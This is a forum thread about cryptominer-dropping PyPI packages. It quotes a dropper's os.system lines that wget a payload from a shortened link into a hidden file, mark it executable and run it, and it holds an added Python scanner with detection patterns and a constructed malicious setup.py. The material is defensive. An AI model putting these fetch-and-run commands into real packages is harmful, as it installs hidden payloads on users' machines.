Is PyPI something to look out for in Porteus?

Posted: 20 Aug 2022, 01:52
by Karmi
Just reading the '241 npm and PyPI packages caught dropping Linux cryptominers article and wondered...

Is PyPI something to look out for in Porteus?

Posted: 20 Aug 2022, 02:29
by ncmprhnsbl
the fact that they (bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would (should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl', which is a systemd command that porteus doesn't have..

more generally, any package from any source on the web should be treated with caution..
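A small static check that turns the observations in this post into something you can run over a downloaded package before installing it. This is an added example for the thread, not code from the article or from any of the posters; the indicator names, weights and thresholds are assumptions chosen for illustration, and the sample setup.py below is constructed, reproducing only the three os.system lines quoted above inside an install hook. It flags the sudo call, the shortened download link, the hidden ./.cmc file, the blanket output suppression and the custom install hook, and it also carries a rule for the systemctl persistence step mentioned above even though that step is absent from the quoted snippet.

```python
import re
from typing import Dict, List, Tuple

# Static indicators drawn from the dropper snippet quoted in the thread plus
# the "creates a service / calls systemctl" observation. The weights and
# thresholds below are assumptions for illustration, not a validated rule set.
SUSPICIOUS_PATTERNS: Dict[str, re.Pattern] = {
    # install-time code execution through a shell
    "shell_exec": re.compile(
        r"\b(?:os\.system|os\.popen|subprocess\.(?:call|run|Popen|check_output))\s*\("),
    # asks for root; on a desktop this is the sudo prompt the post says should alert the user
    "privilege_escalation": re.compile(r"\bsudo\b"),
    # fetches a payload from the network during install
    "remote_download": re.compile(r"\b(?:wget|curl)\b.*https?://"),
    # link shorteners hide the real host (the quoted sample uses a defanged bit[.]ly link)
    "url_shortener": re.compile(r"https?://(?:bit\.ly|bit\[\.\]ly|tinyurl\.com)/", re.I),
    # marks the downloaded file executable
    "make_executable": re.compile(r"\bchmod\s+\+x\b"),
    # writes to or runs a dot-file such as ./.cmc
    "hidden_file": re.compile(r"""(?:^|[\s"'/])\.[\w-]+"""),
    # silences all output, which the quoted sample does on every line
    "output_suppressed": re.compile(r">\s*/dev/null\s+2>&1"),
    # systemd persistence, which (as noted in the thread) would not even work on Porteus
    "persistence": re.compile(r"\bsystemctl\s+(?:enable|start)\b|/etc/systemd/system/"),
    # setup.py hooks that run arbitrary code at pip install time
    "custom_install_hook": re.compile(r"class\s+\w+\s*\(\s*install\s*\)|cmdclass\s*="),
}

Finding = Dict[str, object]


def scan_source(source: str) -> List[Finding]:
    """Return one finding per line that trips at least one indicator."""
    findings: List[Finding] = []
    for line_no, text in enumerate(source.splitlines(), start=1):
        tags = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)]
        if tags:
            findings.append({"line": line_no, "text": text.strip(), "tags": tags})
    return findings


def risk_verdict(findings: List[Finding]) -> Tuple[int, str]:
    """Score = number of distinct indicators in the file; the thresholds are assumed."""
    distinct = {tag for f in findings for tag in f["tags"]}
    score = len(distinct)
    if score == 0:
        return score, "allow"
    if score < 4:
        return score, "review"
    return score, "block"


# Constructed sample: the three lines quoted in the thread wrapped in a
# setuptools install hook, which is how such a dropper runs at `pip install` time.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import os

class PostInstall(install):
    def run(self):
        install.run(self)
        # constructed sample reproducing the dropper quoted in the thread
        os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
        os.system("chmod +x .cmc >/dev/null 2>&1")
        os.system("./.cmc >/dev/null 2>&1")

setup(name="example-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign control: a plain setup.py with no install-time code.
BENIGN_SETUP_PY = '''\
from setuptools import setup
setup(name="clean-pkg", version="1.0", packages=["clean_pkg"])
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        findings = scan_source(src)
        score, verdict = risk_verdict(findings)
        print(f"{label}: score={score} verdict={verdict}")
        for f in findings:
            print(f"  line {f['line']}: {', '.join(f['tags'])}")
```

Running it on a package is just `scan_source(open("setup.py").read())`; anything that scores "review" or "block" deserves reading the file by hand before `pip install`. The score counts distinct indicators rather than raw hits so that a single noisy line does not dominate, and the benign control returns no findings at all.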

Is PyPI something to look out for in Porteus?

Posted: 20 Aug 2022, 08:56
by Karmi
ncmprhnsbl wrote:
20 Aug 2022, 02:29
the fact that they (bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would (should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl', which is a systemd command that porteus doesn't have..

more generally, any package from any source on the web should be treated with caution..
OK...thanks!